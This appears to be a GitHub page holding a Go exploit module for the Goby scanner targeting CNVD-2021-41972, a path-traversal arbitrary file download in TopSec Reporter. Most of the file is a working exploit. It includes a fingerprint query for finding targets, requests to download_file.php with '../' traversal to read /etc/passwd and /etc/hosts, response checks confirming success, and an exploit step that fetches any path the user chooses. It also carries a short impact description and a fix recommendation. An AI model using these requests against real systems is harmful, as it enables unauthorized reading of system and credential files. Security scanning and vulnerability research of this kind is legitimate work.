-
Notifications
You must be signed in to change notification settings - Fork 197
/
TopSec_Reporter_Arbitrary_file_download_CNVD_2021_41972.go
136 lines (133 loc) · 4.31 KB
/
TopSec_Reporter_Arbitrary_file_download_CNVD_2021_41972.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name": "TopSec Reporter Arbitrary file download CNVD-2021-41972",
"Description": "Tianrongxin Technology Group, founded on August 30, 1985, is a leading provider of network security, big data and secure cloud services in China.\\nRandom file download vulnerability exists in Tianrongxin Technology Group Reporter, which can be used by attackers to obtain sensitive information.",
"Product": "TOPSEC Reporter",
"Homepage": "http://www.topsec.com.cn",
"DisclosureDate": "2021-07-18",
"Author": "[email protected]",
"GobyQuery": "title=\"Reporter\"",
"Level": "2",
"Impact": "<p><span style=\"font-size: 14px;\">The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory (..</span><span style=\"font-size: 14px;\">\\ or..</span><span style=\"font-size: 14px;\">/) to download or read a file beyond the original specified path.</span><span style=\"font-size: 14px;\">The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system.</span><br></p>",
"Recommandation": "<p><span style=\"font-size: 14px;\">Limit ..</span><span style=\"font-size: 14px;\">/ symbol is used to determine the input path when the file is downloaded. The best method is that the file should be one to one in the database, and avoid entering the absolute path to obtain the file</span><br></p>",
"References": [
"https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972"
],
"HasExp": true,
"ExpParams": [
{
"name": "path",
"type": "createSelect",
"value": "../../../../../../../../../etc/passwd,../../../../../../../../../etc/hosts",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/view/action/download_file.php?filename=../../../../../../../../../etc/passwd",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "daemon",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/view/action/download_file.php?filename=../../../../../../../../../etc/hosts",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "127.0.0.1",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/view/action/download_file.php?filename={{{path}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"Tags": [
"file download"
],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}